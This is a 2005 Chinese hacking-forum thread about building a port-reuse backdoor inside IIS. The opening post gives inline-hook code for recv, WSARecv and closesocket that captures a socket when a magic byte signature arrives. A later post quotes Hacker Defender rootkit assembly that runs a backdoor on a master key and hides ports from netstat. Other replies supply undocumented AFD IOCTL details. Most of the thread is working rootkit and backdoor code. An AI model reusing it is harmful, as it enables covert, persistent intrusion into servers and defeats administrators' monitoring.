
实现NT端口复用的后门连接(讨论)


baiyuanfan
 
 

发表于:2005-03-04 10:44  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  TK曾说过,HXDEF用hook recv和WSARecv的方法来实现端口复用的后门连接。
我现在hook了它们和closesocket,结果在我自己的IIS上试,closesocket可以捕获,但是recv和WSARecv就没有任何反应!是TK欺骗了我?还是我编程上的问题?各位帮忙看一下
我的代码:
//begin network,do hook recv&WSArecv&closesocket
LoadLibrary("WS2_32.dll");LoadLibrary("wshtcpip.dll");LoadLibrary("WS2HELP.DLL");
LoadLibrary("msafd.dll");//加载必要模块否则在解除映射后可能缺少需要的库
DWORD __stdcall thunkcode();
int len=0;
int tmp;
disasm_struct s;
BYTE* allocaddr;
s.disasm_defdata=s.disasm_defaddr=4;
//recv
BYTE* target=(BYTE*)GetProcAddress(LoadLibrary("WS2_32.dll"),"recv");
while(len<5){
len+=disasm(target+len,&s);
}
allocaddr=(BYTE*)thunkcode;
memcpy(allocaddr,target,len);
*(int*)(allocaddr+16)=target+len-allocaddr-0x14;//修正thunkcode jmp
VirtualProtect(target,len,PAGE_EXECUTE_READWRITE,(DWORD*)&tmp);
*target=0xe9;
*(DWORD*)(target+1)=allocaddr+0x14-target-5;
//WSArecv
target=(BYTE*)GetProcAddress(LoadLibrary("WS2_32.dll"),"WSARecv");
len=0;//忘了清0付出惨痛代价
while(len<5){
len+=disasm(target+len,&s);
}
allocaddr=(BYTE*)thunkcode+0x64;
memcpy(allocaddr,target,len);
*(int*)(allocaddr+16)=target+len-allocaddr-0x14;//修正thunkcode jmp
VirtualProtect(target,len,PAGE_EXECUTE_READWRITE,(DWORD*)&tmp);
*target=0xe9;
*(DWORD*)(target+1)=allocaddr+0x14-target-5;
//closesocket
target=(BYTE*)GetProcAddress(LoadLibrary("WS2_32.dll"),"closesocket");
len=0;
while(len<5){
len+=disasm(target+len,&s);
}
allocaddr=(BYTE*)thunkcode+0xd4;
memcpy(allocaddr,target,len);
*(int*)(allocaddr+16)=target+len-allocaddr-0x14;//修正thunkcode jmp
VirtualProtect(target,len,PAGE_EXECUTE_READWRITE,(DWORD*)&tmp);
*target=0xe9;
*(DWORD*)(target+1)=allocaddr+0x14-target-5;
//hook complete
while(1){Sleep(100);
dwThreadId=0;DWORD WINAPI threadfunc( LPVOID lpParam );
if(sockuse){
__asm int 3;
threadfunc((void*)sockuse);sockuse=0;}
}
return 0;}

__declspec(naked)
DWORD __stdcall thunkcode(){
// Trampoline area for the three user-mode inline hooks the caller installs on
// WS2_32.dll (recv, WSARecv, closesocket). MSVC inline asm, 32-bit x86, stdcall.
// The layout is addressed by byte offset from the installer, so nothing may move:
//   ori* : 15 NOPs (room for the copied API prologue) followed by a 5-byte JMP
//          (0xE9 + rel32); the installer patches the rel32 at stub+16 so the stub
//          continues in the original API just past the copied bytes.
//   my*  : the replacement routine the patched API entry point jumps to.
// Globals: sockuse (read and written), characteristic (read, defined below).
// Three INT 3 instructions (debugger breakpoints) remain on the active paths.
__asm{// Original comment: "no relocation needed since the code is not moved"
orirecv:              // thunkcode+0x00: stub for recv; installer copies the original prologue here
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
// Original comment: "15 NOPs should be enough room"
__emit 0xe9           // JMP rel32; the next 4 bytes are patched by the installer
__emit 0
__emit 0
__emit 0
__emit 0
// Original comment: "jump back to the remainder of the original API"

myrecv:               // thunkcode+0x14: replacement for recv(s, buf, len, flags)
push ebp
mov ebp,esp
push [ebp+14h]        // flags
push [ebp+10h]        // len
push [ebp+0ch]        // buf
push [ebp+8]          // s
call orirecv          // run the original recv with the caller's arguments
cmp sockuse,0
jnz noaction1         // a socket is already recorded: pass through
cmp eax,0
jz noaction1          // 0 bytes received: pass through
cmp eax,SOCKET_ERROR
jz noaction1          // error: pass through
mov esi,[ebp+0ch]     // esi = buf
mov edi,offset characteristic
cld
mov ecx,10h           // always compares 16 bytes (ecx = 16)
int 3                 // debugger breakpoint
repz cmpsb            // ZF set only if all 16 bytes match
jz manipulateit1
noaction1:
pop ebp
ret 10h               // stdcall: pop 4 args; eax is the original's return value

manipulateit1:
mov edx,[ebp+8]
mov sockuse,edx       // remember the socket handle
mov eax,0             // report 0 bytes to the caller
pop ebp
ret 10h

oriWSARecv:           // thunkcode+0x64: stub for WSARecv (installer: thunkcode+0x64)
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
// Original comment: "15 NOPs should be enough room"
__emit 0xe9           // JMP rel32; the next 4 bytes are patched by the installer
__emit 0
__emit 0
__emit 0
__emit 0
// Original comment: "jump back to the remainder of the original API"

myWSARecv:            // thunkcode+0x78: replacement for WSARecv (7 stdcall args)
push ebp
mov ebp,esp
push [ebp+20h]        // lpCompletionRoutine
push [ebp+1ch]        // lpOverlapped
push [ebp+18h]        // lpFlags
push [ebp+14h]        // lpNumberOfBytesRecvd
push [ebp+10h]        // dwBufferCount
push [ebp+0ch]        // lpBuffers
push [ebp+8]          // s
call oriWSARecv       // run the original WSARecv with the caller's arguments
cmp sockuse,0
jnz noaction2         // a socket is already recorded: pass through
cmp eax,0
jz noaction2          // return value 0: pass through
cmp eax,SOCKET_ERROR
jz noaction2          // error: pass through
mov esi,[ebp+0ch]     // esi = lpBuffers
mov esi,[esi+4]       // esi = lpBuffers[0].buf (WSABUF: len at +0, buf at +4)
mov edi,offset characteristic
cld
mov ecx,10h           // always compares 16 bytes (ecx = 16)
int 3                 // debugger breakpoint
repz cmpsb            // ZF set only if all 16 bytes match
jz manipulateit2
noaction2:
pop ebp
ret 1ch               // stdcall: pop 7 args; eax is the original's return value

manipulateit2:
mov edx,[ebp+8]
mov sockuse,edx       // remember the socket handle
mov eax,0             // report 0 to the caller
pop ebp
ret 1ch

oriclosesocket:       // thunkcode+0xd4: stub for closesocket (installer: thunkcode+0xd4)
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
// Original comment: "15 NOPs should be enough room"
__emit 0xe9           // JMP rel32; the next 4 bytes are patched by the installer
__emit 0
__emit 0
__emit 0
__emit 0
// Original comment: "jump back to the remainder of the original API"

myclosesocket:        // thunkcode+0xe8: replacement for closesocket(s); the original offset comment was left blank
push ebp
mov ebp,esp
mov eax,sockuse
int 3                 // debugger breakpoint
cmp eax,[ebp+8]
jz manipulate3        // is the socket being closed the recorded one?
noaction3:
push [ebp+8]
call oriclosesocket   // forward to the original closesocket
pop ebp
ret 4
manipulate3:
pop ebp
xor eax,eax           // recorded socket: skip the real close and return 0
ret 4

characteristic:       // 17-byte signature; the compares above read only its first 16 bytes (ecx = 10h)
__emit 19h
__emit 85h
__emit 08h
__emit 28h
__emit 'b'
__emit 'a'
__emit 'i'
__emit 'y'
__emit 'u'
__emit 'a'
__emit 'n'
__emit 'f'
__emit 'a'
__emit 'n'
__emit 'g'
__emit 0ffh
__emit 0h

}
}

---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
  flashsky

 
 

发表于:2005-03-04 11:09  

 
  发帖: 1120
积分: 75
注册: 2002-09-04
 
  在2002的XCON里,我的议题部分涉及HOOK recv/wsarecv的技术
当时就谈到了一个问题,针对完成端口的SOCKET编程模式,HOOK recv/wsarecv会存在一些问题.
而不幸的是,IIS里的全部是采用完成端口模式编写的SOCKET,因此你就无须抱怨TK了

---
无论将来我们多么富有,或者多么有成就,我们必须站在苦难者的一边,因为那是做人的立场

 
  baiyuanfan

 
 

发表于:2005-03-04 12:35  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  谢谢闪空提醒,呵呵,我回去换个断点位置试试。
异步的重叠IO模式真是麻烦呀。
PS:TK的RP有WT,不抱怨他抱怨谁?不抱怨也要找理由抱怨,嘿嘿。。

---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
  baiyuanfan

 
 

发表于:2005-03-04 23:27  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  今天做了实验,完成端口模式编写的SOCKET下,在截获了WSARecv返回的数据缓冲区里并没有我们想要的数据,而这些数据应该会在
CompletionRoutine或者EVENT产生时返回到缓冲区。郁闷呀,FS,TK,glacier等高手们帮忙啊,我该怎么办呢?谢谢各位呀

---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
  MustBE

 
 

发表于:2005-03-06 09:46  

 
  发帖: 8
积分: 0
注册: 2004-03-21
 
  根据具体用处的不同,建议你改用ipfilterdriver或firewall-hook(主要区别在于是否要处理transmit出去的数据)

 
  cocoruder

 
 

发表于:2005-03-06 10:54  

 
  发帖: 347
积分: 1
注册: 2003-10-09
 
  关注ing...

 
  baiyuanfan

 
 

发表于:2005-03-06 13:45  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  限制用ring3级hook,这个项目中不考虑ring0的实现方案

---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
  baiyuanfan

 
 

发表于:2005-03-06 19:18  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  摘自Network Programming for Windows:
Winsock提供了一些有趣的I/O模型,有助于应用程序通过一种“异步”方式,一次对一个或多个套接字上进行的通信加以管理。这些模型包括select(选择)、WSAAsyncSelect(异步选择)、WSAEventSelect(事件选择)、Overlapped I/O(重叠式I/O)以及Completion port(完成端口)等等。
我的理解:
1是阻塞式的,2和3是非重叠异步式的,它们应该都是在事件触发之后再调用一次
recv/wsarecv,对我们的hook没有影响。然而后两者是重叠式的异步IO,在WSARecv失败之后到事件发生时数据已经到达了buffer
而没有再经过一次recv/wsarecv调用。
因此我们拦截recv/wsarecv似乎无效。
请高手指点!谢谢

---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
  glacier

 
 

发表于:2005-03-07 00:28  

 
  发帖: 1880
积分: 26
注册: 2001-03-04
 
  你HOOK IIS的send函数成功了吗?

---
浮生事,苦海舟,荡去漂来不自由

 
  baiyuanfan

 
 

发表于:2005-03-07 09:43  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  这个项目里不需要hook send函数,所以没有做实验。但是我想对于异步重叠IO来说,wsasend和wsarecv应该是一样吧

---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
  1haoyu

 
 

发表于:2005-03-07 16:10  

 
  发帖: 3061
积分: 0
注册: --
 
  顶,问题关注中

 
  jackiefzj

 
 

发表于:2005-03-07 19:19  

 
  发帖: 48
积分: 0
注册: 2003-09-24
 
  hxdef就是拦截WSARecv和recv,而且也实现了完成端口的拦截
可以参考一下
这几天也在弄这个问题,可惜看到hxdef那一堆的汇编和delphi就头痛

 
  dumplogin

 
 

发表于:2005-03-07 19:53  

 
  发帖: 199
积分: 0
注册: 2003-08-16
 
  咋就不考虑一下ReadFile/WriteFile 呢

 
  baiyuanfan

 
 

发表于:2005-03-07 20:07  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  楼上的兄弟说深入一些好吗?小弟是菜鸟

---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
  baiyuanfan

 
 

发表于:2005-03-08 19:33  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  dumplogin老兄,我对WSOCK不是很了解啊!你的意思是不是:
非重叠IO的异步WSARecv是在得到TDI的数据到来通知后,是又调用了一次WSARecv,不影响hook
而重叠IO的WSARecv在得到TDI的数据到来通知后虽然没有再调用一次WSARecv,数据就到了缓冲区,但是其实是在收到通知后调用了NtReadFile?

而且进一步,是不是所有(wsa)recv函数实际都是通过NtReadFile实现?

但是我看过一些TDI的驱动,他的数据收发是在IRP_MJ_INTERNAL_DEVICE_CONTROL里的TDI_XXXXXXX函数实现的,和普通的FSD不一样。

谢谢指教!

---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
  dumplogin

 
 

发表于:2005-03-09 10:35  

 
  发帖: 199
积分: 0
注册: 2003-08-16
 
  我的意思是说, windows想读取SOCKET的内容,并不一定只有recv/wsarecv, 用ReadFile照样可以读, WriteFile可写.
你思路局限在WSOCK上面, 可能会碰到无法解决的东西.

 
  baiyuanfan

 
 

发表于:2005-03-09 10:53  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  其实我主要是问recv/wsarecv或者重叠IO的recv/wsarecv最后是调用了NtReadFile还是就是NtDeviceIOControl?
即使如果是NtReadFile,那个filehandle和socket之间有什么样的对应关系??返回值的意义相同吗?
而且如果在NtReadFile中指定了userAPC的参数的话,我们hook NtReadFile也一样没有用吧,除非去hook那个APC
谢谢各位高手指教啊

---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
  dang0102

 
 

发表于:2005-03-11 15:42  

 
  发帖: 35
积分: 0
注册: 2004-11-10
 
  同意dumplogin 的说法,我自己测试hook SVCHOST(RPC
服务)进程中的recv,替换的函数包括wsock32和ws2_32中的recv()。在此之前普通程序可以成功,但是在该进程却通不过。我当时就怀疑
是该进程中接收socket数据的函数不是recv。
    继续研究!

 
  baiyuanfan

 
 

发表于:2005-03-12 17:36  

 
  发帖: 317
积分: 0
注册: 2004-01-22
 
  花了两天工夫看了看黑客守卫者的代码,终于发现了问题,TK说的不完全正确,recv/wsarecv的确是hook了,但是还有些更重要的,大家看看:

1  recv/wsarecv
//TWSARecv=function(const
ASock:TSocket;ABuffers:LPWSABUF;ABufferCount:DWORD;var
VNumberOfBytesRecvd:DWORD;var
VFlags:DWORD;AOverlapped:LPWSAOVERLAPPED;ACompletionRoutine:LPWSAOVERLAPPED_COMPLETION_ROUTINE):Integer;
stdcall;
@fNewWSARecv:
  push 004h                                     //local variables
  call @NewAPIHead
  {
   -004         -       LResult:Cardinal
  }

  mov dword ptr [ebp-004h],SOCKET_ERROR

  mov edi,[ebp+01Ch]
  mov esi,[ebp+014h] //newfeature

  lea eax,[ebx+@HT_OldWSARecv]
  test dword ptr [eax+011h],-001h
  jz @fNewWSARecv_end
  push dword ptr [ebp+020h]                     //ACompletionRoutine
  push dword ptr [ebp+01Ch]                     //AOverlapped
  push dword ptr [ebp+018h]                     //VFlags
  push dword ptr [ebp+014h]                     //VNumberOfBytesRecvd
  push dword ptr [ebp+010h]                     //ABufferCount
  push dword ptr [ebp+00Ch]                     //ABuffers
  push dword ptr [ebp+008h]                     //ASock
  call eax
  mov [ebp-004h],eax
  test eax,eax
  jz @fNewWSARecv_nulres
  inc eax
  jnz @fNewWSARecv_gotbuf
  call [ebx+@WSAGetLastErrorAddr]
  cmp eax,ERROR_IO_PENDING
  jnz @fNewWSARecv_end

@fNewWSARecv_nulres:
  test edi,edi
  jnz @fNewWSARecv_overlapped
  mov eax,[esi]
  test eax,eax
  jz @fNewWSARecv_end
  inc eax
  jmp @fNewWSARecv_gotbuf

@fNewWSARecv_overlapped:
  mov eax,[ebp+00Ch]
  mov eax,[eax+004h]
  test eax,eax
  jz @fNewWSARecv_end
  mov esi,eax
  push MASTER_KEY_LEN
  push esi
  call [ebx+@IsBadReadPtrAddr]
  test eax,eax
  jnz @fNewWSARecv_lookaround
  lea edi,[ebx+@cMasterKey]
  call @cmp2pchars_casesens
  test eax,eax
  jnz @fNewWSARecv_doexec
@fNewWSARecv_lookaround:
  sub esi,MASTER_KEY_LEN
  push MASTER_KEY_LEN
  push esi
  call [ebx+@IsBadReadPtrAddr]
  test eax,eax
  jnz @fNewWSARecv_end
  jmp @fNewWSARecv_DoCompareBuf

@fNewWSARecv_gotbuf:
  cmp eax,MASTER_KEY_LEN+1
  jne @fNewWSARecv_end
  mov esi,[ebp+00Ch]
  mov esi,[esi+004h]
@fNewWSARecv_DoCompareBuf:
  lea edi,[ebx+@cMasterKey]
  call @cmp2pchars_casesens
  test eax,eax
  jz @fNewWSARecv_end

@fNewWSARecv_doexec:
  xor eax,eax
  mov [esi],eax
  push dword ptr [ebp+008h]
  call @DoExec
  xor eax,eax
  mov ecx,[ebp+014h]
  mov [ecx],eax
  mov [ebp-004h],eax

@fNewWSARecv_end:
  push 01Ch
  jmp @NewAPITail

2  更重要的,嘿嘿。

//TReadFile=function(AFile:THandle;ABuffer:Pointer;ANumberOfBytesToRead:DWORD;ANumberOfBytesRead:PDWORD;AOverlapped:POverlapped):BOOL;stdcall;
@fNewReadFile:
  push 004h                                     //local variables
  call @NewAPIHead
  {
   -004         -       LResult:Boolean
  }

  push 000h
  pop dword ptr [ebp-004h]

  lea eax,[ebx+@HT_OldReadFile]
  test dword ptr [eax+011h],-001h
  jz @fNewReadFile_end
  mov esi,[ebp+00Ch]
  push dword ptr [ebp+018h]             //AOverlapped
  push dword ptr [ebp+014h]             //ANumverOfBytesRead
  push dword ptr [ebp+010h]             //ANumverOfBytesToRead
  push dword ptr [ebp+00Ch]             //ABuffer
  push dword ptr [ebp+008h]             //AFile
  call eax
  mov [ebp-004h],eax

  mov ecx,eax
  mov eax,[ebp+014h]
  test eax,eax
  jz @fNewReadFile_overlapped
  mov eax,[eax]
  inc eax
  test ecx,ecx
  jnz @fNewReadFile_gotbuf

@fNewReadFile_overlapped:
  call [ebx+@GetLastErrorAddr]
  cmp eax,ERROR_IO_PENDING
  jnz @fNewReadFile_end

  test esi,esi  //newfeature
  jz @fNewReadFile_end
  push MASTER_KEY_LEN
  push esi
  call [ebx+@IsBadReadPtrAddr]
  test eax,eax
  jnz @fNewReadFile_lookaround
  lea edi,[ebx+@cMasterKey]
  call @cmp2pchars_casesens
  test eax,eax
  jnz @fNewReadFile_doexec
@fNewReadFile_lookaround:
  sub esi,MASTER_KEY_LEN
  push MASTER_KEY_LEN
  push esi
  call [ebx+@IsBadReadPtrAddr]
  test eax,eax
  jnz @fNewReadFile_end
  push MASTER_KEY_LEN
  pop ecx
@fNewReadFile_lookaround_loop:
  push ecx
  lea edi,[ebx+@cMasterKey]
  call @cmp2pchars_casesens
  pop ecx
  test eax,eax
  jnz @fNewReadFile_doexec
  inc esi
  loop @fNewReadFile_lookaround_loop
  jmp @fNewReadFile_end

@fNewReadFile_gotbuf:
  cmp eax,MASTER_KEY_LEN+1
  jne @fNewReadFile_end
  mov esi,[ebp+00Ch]
@fNewReadFile_DoCompareBuf:
  lea edi,[ebx+@cMasterKey]
  call @cmp2pchars_casesens
  test eax,eax
  jz @fNewReadFile_end

@fNewReadFile_doexec:
  xor eax,eax
  mov [esi],eax
  push dword ptr [ebp+008h]
  call @DoExec
  xor eax,eax
  inc eax
  mov [ebp-004h],eax
  mov eax,[ebp+00Ch]
  mov [eax],000h
  mov eax,[ebp+014h]
  test eax,eax
  jz @fNewReadFile_end
  mov [eax],000h

@fNewReadFile_end:
  push 014h
  jmp @NewAPITail

3  还有一个就是NtDeviceIoControlFile似乎和后门连接没关系

//TNtDeviceIoControlFile=function(AFileHandle,AEvent:THandle;AApcRoutine,AApcContext,AIoStatusBlock:Pointer;AIoControlCode:Cardinal;AInputBuffer:Pointer;AInputBufferLength:Cardinal;AOutputBuffer:Pointer;AOutputBufferLength:Cardinal):Cardinal;stdcall;
@fNewNtDeviceIoControlFile:
  push 090h                             //local variables
  {
   -090..014    -       LBuf:array of Char
   -010         -       LLocPortOfs:Cardinal
   -00C         -       LROWSize:Cardinal
   -008         -       LFileMappingAddr:Pointer
   -004         -       LResult:Boolean
  }
  call @NewAPIHead
  push 000h
  pop dword ptr [ebp-004h]

  lea eax,[ebx+@HT_OldNtDeviceIoControlFile]
  test dword ptr [eax+011h],-001h
  jz @fNewNtDeviceIoControlFile_end
  push dword ptr [ebp+02Ch]                     //AOutputBufferLength
  push dword ptr [ebp+028h]                     //AOutputBuffer
  push dword ptr [ebp+024h]                     //AInputBufferLength
  push dword ptr [ebp+020h]                     //AInputBuffer
  push dword ptr [ebp+01Ch]                     //AIoControlCode
  push dword ptr [ebp+018h]                     //AIoStatusBlock
  push dword ptr [ebp+014h]                     //AApcContext
  push dword ptr [ebp+010h]                     //AApcRoutine
  push dword ptr [ebp+00Ch]                     //AEvent
  push dword ptr [ebp+008h]                     //AFileHandle
  call eax
  mov [ebp-004h],eax
  test eax,eax
  jnz @fNewNtDeviceIoControlFile_end
  mov eax,[ebp+01Ch]                            //AIoControlCode
  cmp eax,000120003h
  jz @fNewNtDeviceIoControlFile_query
  cmp eax,000210012h
  jnz @fNewNtDeviceIoControlFile_end
@fNewNtDeviceIoControlFile_query:
  lea esi,[ebp-090h]                            //LBuf
  push 000h
  pop [esi]

  push 000h                                     //ReturnLength
  push 07Ch                                     //ObjectInformationLength
  push esi                                      //ObjectInformation
  push 001h                                     //ObjectInformationClass = ObjectNameInformation
  push [ebp+008h]                               //ObjectHandle
  call [ebx+@NtQueryObjectAddr]
{  test eax,eax
  jnz @fNewNtDeviceIoControlFile_end}
  xor eax,eax                                   //cuz of NT4 :(

  push 004h
  pop dword ptr [ebp-010h]                      //LLocPortOfs = UDP
  mov [ebp-00Ch],MIB_UDPROW_SIZE                //LROWSize = UDP
  movzx ecx,word ptr [esi]                      //ecx -> length in AnsiString
  test ecx,ecx
  jz @fNewNtDeviceIoControlFile_end
  add esi,008h                                  //edi -> name in AnsiString
  mov [esi+ecx],ax                              //add null on the end of wchar

  lea edi,[ebx+@cDeviceTCP]
  call @cmp_wide_pchar_caseinsens
  xor ecx,ecx
  test eax,eax
  jnz @fNewNtDeviceIoControlFile_relevant
  lea edi,[ebx+@cDeviceUDP]
  call @cmp_wide_pchar_caseinsens
  test eax,eax
  jz @fNewNtDeviceIoControlFile_end
  push 01h
  pop ecx
@fNewNtDeviceIoControlFile_relevant:
  mov eax,[ebp+01Ch]                            //AIoControlCode
  cmp eax,000120003h
  jz @fNewNtDeviceIoControlFile_like_netstat
                          
  cmp dword ptr [ebp+024h],TDI_CONN_IN_SIZE     //AInputBufferLength
  jnz @fNewNtDeviceIoControlFile_end
  mov eax,[ebp+020h]
  mov eax,[eax+010h]                            //TdiConnIn.RemoteAddressLength
  sub eax,03h                                   //should be 3
  jz @fNewNtDeviceIoControlFile_like_fport
  dec eax                                       //or 4
  jnz @fNewNtDeviceIoControlFile_end
@fNewNtDeviceIoControlFile_like_fport:         //TCP: ecx = 0 | UDP: ecx = 1
  mov esi,[ebp+028h]                            //AOutputBuffer
  test esi,esi
  jz @fNewNtDeviceIoControlFile_end
  push ecx

  call @OpenFileMapping
  test eax,eax
  jz @fNewNtDeviceIoControlFile_pend
  mov [ebp-008h],eax
  mov edi,eax

  push FMP_HIDDEN_PORTS
  call @GetFileMappingConst
  pop ecx
  jecxz @fNewNtDeviceIoControlFile_fgo
  movzx eax,word ptr [edi]
  shl eax,001h
  add edi,eax                                   //number of TCP ports * 2 (sizeof(ushort))
  inc edi
  inc edi                                       //+ sizeof(ushort)
@fNewNtDeviceIoControlFile_fgo:
  inc edi
  inc edi                                       //+ sizeof(ushort)
  xor eax,eax
  xchg esi,edi
  movzx ecx,word ptr [edi+00Ch]
  xchg ch,cl                                    //htons :)
@fNewNtDeviceIoControlFile_floop:
  lodsw
  test eax,eax
  jz @fNewNtDeviceIoControlFile_CloseMapping
  cmp eax,ecx
  jnz @fNewNtDeviceIoControlFile_floop
  mov [ebp-004h],0C0000141h                     //STATUS_INVALID_ADDRESS
  push TDI_CONN_OUT_FREE_SIZE
  pop ecx
  xor eax,eax
  rep stosb
  mov eax,[ebp+018h]                            //AIoStatusBlock
  test eax,eax
  jz @fNewNtDeviceIoControlFile_CloseMapping
  mov [eax+004h],ecx
  jmp @fNewNtDeviceIoControlFile_CloseMapping

@fNewNtDeviceIoControlFile_like_netstat:       //and fport xp
  cmp dword ptr [ebp+024h],024h                 //AInputBufferLength
  jb @fNewNtDeviceIoControlFile_end             //should be => 024h
  mov ecx,[ebp+020h]                            //AInputBuffer
  cmp byte ptr [ecx+001h],004h                  //2nd byte of AInputBuffer
  jne @fNewNtDeviceIoControlFile_end            //should be = 004h
  cmp byte ptr [ecx+011h],001h                  //17th byte of AInputBuffer
  jne @fNewNtDeviceIoControlFile_end            //should be = 001h
  movzx eax,byte ptr [ecx]                      //0 if TCP, 1 if UDP
  push eax
  dec eax
  jz @fNewNtDeviceIoControlFile_dif_ex
  add dword ptr [ebp-00Ch],MIB_TCPROW_SIZE-MIB_UDPROW_SIZE      //LROWSize = TCP
  add dword ptr [ebp-010h],004h                 //LLocPortOfs = TCP

@fNewNtDeviceIoControlFile_dif_ex:
  movzx eax,byte ptr [ecx+010h]                 //1 = normal, 2 = extended
  dec eax
  jz @fNewNtDeviceIoControlFile_OpenMapping
  dec eax
  jnz @fNewNtDeviceIoControlFile_pend           //no normal, no ex?
  add dword ptr [ebp-00Ch],004h                 //extended = + PID
@fNewNtDeviceIoControlFile_OpenMapping:
  call @OpenFileMapping
  test eax,eax
  jz @fNewNtDeviceIoControlFile_pend
  mov [ebp-008h],eax
  mov edi,eax

  push FMP_HIDDEN_PORTS
  call @GetFileMappingConst
  pop ecx
  jecxz @fNewNtDeviceIoControlFile_go
  movzx eax,word ptr [edi]
  shl eax,001h
  add edi,eax                                   //number of TCP ports * 2 (sizeof(ushort))
  inc edi
  inc edi                                       //+ sizeof(ushort)

@fNewNtDeviceIoControlFile_go:
  inc edi
  inc edi                                       //edi on tcp | udp ports

  mov esi,[ebp+028h]                            //AOutputBuffer

  mov eax,[ebp+018h]                            //AIoStatusBlock
  mov eax,[eax+004h]                            //AIoStatusBlock.Information
  cdq

  push dword ptr [ebp-00Ch]                     //LROWSize
  pop ecx

  div ecx
  xchg edx,eax                                  //edx should be 0 after div

  test eax,eax
  jnz @fNewNtDeviceIoControlFile_CloseMapping
  test edx,edx
  jz @fNewNtDeviceIoControlFile_CloseMapping

  xchg esi,edi
@fNewNtDeviceIoControlFile_row_loop:
  push esi
@fNewNtDeviceIoControlFile_port_loop:
  lodsw                                         //eax -> hidden port number
  test eax,eax
  jz @fNewNtDeviceIoControlFile_next_row
  xchg ah,al                                    //ntohs
  mov ecx,[ebp-010h]                            //LLocPortOfs
  cmp eax,[edi+ecx]                             //MIB_[TCP|UDP]ROW.dwLocalPort
  jnz @fNewNtDeviceIoControlFile_port_loop
  push edi
  push esi
  push edx

  push dword ptr [ebp-00Ch]                     //LROWSize
  pop ecx
  push ecx

  mov eax,edx
  dec eax
  cdq
  mul ecx

  mov ecx,eax
  mov eax,[ebp-00Ch]                            //LROWSize
  lea esi,[edi+eax]
  rep movsb

  mov eax,[ebp+018h]                            //AIoStatusBlock
  mov ecx,[ebp-00Ch]                            //LROWSize
  sub dword ptr [eax+004h],ecx                  //AIoStatusBlock.Information

  pop ecx
  xor eax,eax
  rep stosb                                     //del last record
                                                //we don't need this cuz of changing AIoStatusBlock.Information
                                                //but would be possible to detect hxdef when
                                                //debugging netstat cuz may be quite strange to have last record
                                                //copied several times after the end of AOutputBuffer

  pop edx
  pop esi
  pop edi
  jmp @fNewNtDeviceIoControlFile_next_record

@fNewNtDeviceIoControlFile_next_row:
  add edi,[ebp-00Ch]

@fNewNtDeviceIoControlFile_next_record:
  pop esi
  dec edx
  jnz @fNewNtDeviceIoControlFile_row_loop

@fNewNtDeviceIoControlFile_CloseMapping:
  push dword ptr [ebp-008h]
  call @CloseFileMapping
  push ecx
@fNewNtDeviceIoControlFile_pend:
  pop ecx
@fNewNtDeviceIoControlFile_end:
  push 028h
  jmp @NewAPITail

各位大牛可要评论呀。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
baiyuanfan
 

发表于:2005-03-12 17:40  

 
发帖: 317
积分: 0
注册: 2004-01-22
 
另外说下我自己挂接iis的wsarecv/recv的结果,在客户连接时的确有wsarecv调用,但是这个调用会阻塞,在阻塞的时间里客户端已经得到
了网页的数据,网页已经显示了出来。一段明显的延迟后,wsarecv才返回。而且是返回-1。我也比较晕,毕竟是菜鸟,等各位大虾评论吧,希望各位教教
小弟。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
gsid
 

发表于:2005-03-13 17:07  

 
发帖: 15
积分: 0
注册: 2004-08-31
 
关注

 
baiyuanfan
 

发表于:2005-03-14 19:23  

 
发帖: 317
积分: 0
注册: 2004-01-22
 
根据最近向无花果兄讨教的结果,比较可能的是,IIS的完成端口模式,是用wsarecv来传输连接状态,所以我们可以挂钩到wsarecv的调用,但是
它并不负责数据传输,所以我们发现它是延时的。而根据hxdef挂钩readfile来判断,IIS可能是用readfile来读取数据。并且知道,
IIS6 direct talk to
http.sys不通过wsock。所以我觉得不去WIN32API层挂钩是一个好选择。现在看来NtDeviceIoControlFile是个不错的
替补对象。

我挂了它,访问自己的IIS,SICE弹出7-8次。看来的确不错。但是还是有问题,这个系统服务未公开,很多参数不知道意义。
    status = NtDeviceIoControlFile(
                 (HANDLE)Handle,
                 event,
                 apcRoutine,
                 apcContext,
                 ioStatusBlock,
                 IOCTL_AFD_RECEIVE,
                 &recvInfo,
                 sizeof(recvInfo),
                 NULL,
                 0
                 );
1。不知道AFD_RECV_INFO结构定义,就不知道buffer的位置,无法提取数据。
2。不知道IOCTL_AFD_RECEIVE的值就没法分辨recv和其他的TDI调用,如accept,closesocket,send等。

强烈希望潜水的高手们露个头,帮助一下:)
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day

 
tombkeeper
 

发表于:2005-03-15 15:10  

 
发帖: 3234
积分: 11
注册: 2001-09-20
 
刚才调了一下,你看看能不能用:

#define IOCTL_AFD_RECEIVE    0x00012017

buffer = *(char *)(*(DWORD *)recvInfo + sizeof(DWORD))
---
我寒不能怨人傻
人傻不能怨政府

 
baiyuanfan
 

发表于:2005-03-15 16:29  

 
发帖: 317
积分: 0
注册: 2004-01-22
 
把我自己挂它的实验结果放上来。
ntdevioctrl:后面是10个参数的值。invoke result:是返回结果。0 表示成功,103 表示 pending。
这是我一个get请求截下来的。
